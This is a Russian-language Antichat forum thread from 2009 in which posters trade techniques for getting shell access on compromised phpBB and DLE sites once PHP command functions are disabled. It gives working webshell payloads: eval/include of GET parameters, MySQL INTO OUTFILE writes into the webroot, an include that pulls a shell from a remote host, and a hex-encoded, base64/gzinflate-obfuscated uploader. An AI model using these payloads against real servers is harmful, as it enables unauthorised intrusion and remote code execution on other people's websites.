03.05.2009, 00:18
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076
Репутация:
4303
|
|
geezer.code, нет, там как бэ не сейф мод, если бы был сейф мод - пшп ругался бы на то что включен сейф мод, а пшп ругается что отключены функции
Warning: shell_exec() has been disabled for security reasons
Вообще тут надо пробовать другие системные функции, типа popen или passthru
а вообще лучше залить гифку с полноценным шеллом, вместо
'phpbb:system($_GET[cmd])'
вставить
='phpbb:include($_GET[cmd])'
и его проинклудить. А там уже можно посмотреть какие функции отключены и если отключены все функции позволяющие выполнять команды, пробовать залить перловый шелл с штацессом
вот, удачке в хэке =)
|
|
|
03.05.2009, 00:49
|
|
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
Провел на форуме:
10605912
Репутация:
4693
|
|
Лучше eval, т.к. удалённый инклуд тоже может быть запрещён.
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..
Мой блог: http://qwazar.ru/.
|
|
|
|
03.05.2009, 01:03
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076
Репутация:
4303
|
|
Qwazar, я про удалённый инклуд и не говорил)
а вообще лучше залить гифку с полноценным шеллом
так как он в админке пшпбб, то там наверника есть способ залить картинку |
|
|
|
03.05.2009, 02:57
|
|
Участник форума
Регистрация: 16.11.2006
Сообщений: 230
Провел на форуме:
599789
Репутация:
227
|
|
а ещё лучше echo =)
echo `ls -la`; - с косыми кавычками выполняет ту же функцию, что и пасстру ;-)
|
|
|
|
03.05.2009, 03:06
|
|
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
Провел на форуме:
10605912
Репутация:
4693
|
|
Сообщение от o3,14um
а ещё лучше echo =)
echo `ls -la`; - с косыми кавычками выполняет ту же функцию, что и пасстру ;-)
Ничем не лучше, для того, чтобы это работало, должна быть включена функция shell_exec, а она не пашет при сейф моде. В отличии от eval.
P.S.
И работает она не как passthru(), а как shell_exec().
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..
Мой блог: http://qwazar.ru/.
Последний раз редактировалось Qwazar; 03.05.2009 в 03:10..
|
|
|
|
03.05.2009, 04:04
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161
Репутация:
142
|
|
Заранее извиняюсь,что не прочитал всю тему,но нельзя ли выполнить phpinfo() для просмотра safe_mode = On
Если РНР запущен в виде CGI модуля, то safe mode полюбому отсутствует.Также при юзании include,fopen(),file() и других функций safe mode даст о себе знать.Можно попробовать позапускать сценарии в различных каталогах(функциями system(),exec(),popen(),если они работают). Опять же будет попытка ругани со стороны сервера на то,что ты откроешь чужой фаил.Значит,опять сейф мод стоит.То бишь сразу будет ясно,что стоит директива safe_mode_exec_dir.Ещё можно попробовать создавать файлы с помощью php функций в других каталогах.Если будет ругаться - опять safe mode.Вообще,при safe mode,будут введены ограничения на следующие функции:
chgrp include require
chmod link rmdir
chown passthru symlink
exec popen system
fopen readfile unlink
file rename
Если со всеми ними будет неладно,то 100% стоит safe mode.Пробуй)
|
|
|
|
03.05.2009, 18:37
|
|
Новичок
Регистрация: 21.12.2008
Сообщений: 24
Провел на форуме:
485675
Репутация:
10
|
|
select '<? eval(stripslashes($_GET[phpinfo])); ?>' from dle_files into outfile 'C:/Program Files/VertrigoServ/www/engine/inc/check.php'
Как при имеющимся доступе в PMA залить нормальный шелл, а не это.
|
|
|
|
03.05.2009, 20:47
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Код:
select '<? include("http://bestquest.info/shell.txt") ?>' into outfile 'C:/Program Files/VertrigoServ/www/engine/inc/check.php'
|
|
|
|
04.05.2009, 07:23
|
|
Новичок
Регистрация: 21.12.2008
Сообщений: 24
Провел на форуме:
485675
Репутация:
10
|
|
Сообщение от mailbrush
Код:
select '<? include("http://bestquest.info/shell.txt") ?>' into outfile 'C:/Program Files/VertrigoServ/www/engine/inc/check.php'
Не у себя попробывал файл check.php создался в нём текст <? include("http://127.0.0.1/shell.txt") ?>
захожу на сайт шелл выплёвывает это
Warning: include() [function.include]: URL file-access is disabled in the server configuration in C:\Program Files\VertrigoServ\www\check.php on line 1
Warning: include(http://127.0.0.1/shell.txt) [function.include]: failed to open stream: no suitable wrapper could be found in C:\Program Files\VertrigoServ\www\check.php on line 1
Warning: include() [function.include]: Failed opening 'http://127.0.0.1/shell.txt' for inclusion (include_path='.;C:\Program Files\VertrigoServ\Smarty') in C:\Program Files\VertrigoServ\www\check.php on line 1
|
|
|
|
04.05.2009, 08:43
|
|
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
Провел на форуме:
3152874
Репутация:
1020
|
|
загрузи какой нибудь мини аплоудер, например(пробелы поуберай):
PHP код:
select
0x3c3f706870206576616c28677a696e666c617465286261736536345f6465636f646528276a5a505062707441454d62766c76774f6f35556c45696b4f6971746547724261705553706c4e535737665a6957516a44576944787237445974616f2b583376724a512b416b6c433769634532394e4244716e515854427858506654437a734c332f575a326471693543744642684a72636c5472767055366665393036655863687665334a6e5661727877324f7135556130386a456b5833564d3179796f32366674576c38666c6f4941396430416731375643494977706e556b616f565153655732575172566a5332586b69395636415434746278683841596979654f5462424e36723270693045744e6949692b4350686d6655595646337866457a665451786263795a2b2f616a782f41677846444749695a76774a6278655a62506245483647502b36534b3468445745657271326746416c3949714a597638773864625a72583032674b77795a634a71744643446433447a41724d504d53492f44444a7255316d486a6b6542596f4b6a45635730522f4e51534268596e7561434a79485a2f75734b3053656859525759464a44466678434d2f73645530684369763757356265773232654a647657477445736875304742416f7a617741435737466f624f4f4a7a4849694743746d674e6b4e7343327433364f38723475484842622b50347846577867713775335131563230596536345234614a537a654c632f652f68483477744179794159766f6d584c74546d667a394434645073727a5675524265512f385a6b4459754a5244704767736a77677661334b3731653331756249443341414f41664749506e652b735a4c79475452477347633559797758474b7a4a6a4c5248786164767a7156756e79735077413336484c48636a664d416e75546433363957506c5572574e5564514a6530733543746c3947764f436c47354873557877655178484354724e4e7347635777544f42336d697779574762702f41557237676b4e614657664b6333304d5779356a2f384b2b77702f41413d3d272929293b203f3e
INTO DUMPFILE
'C:/Program Files/VertrigoServ/www/engine/inc/uplouder.php'
ну а уже с помошью него загрузи шелл. |
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
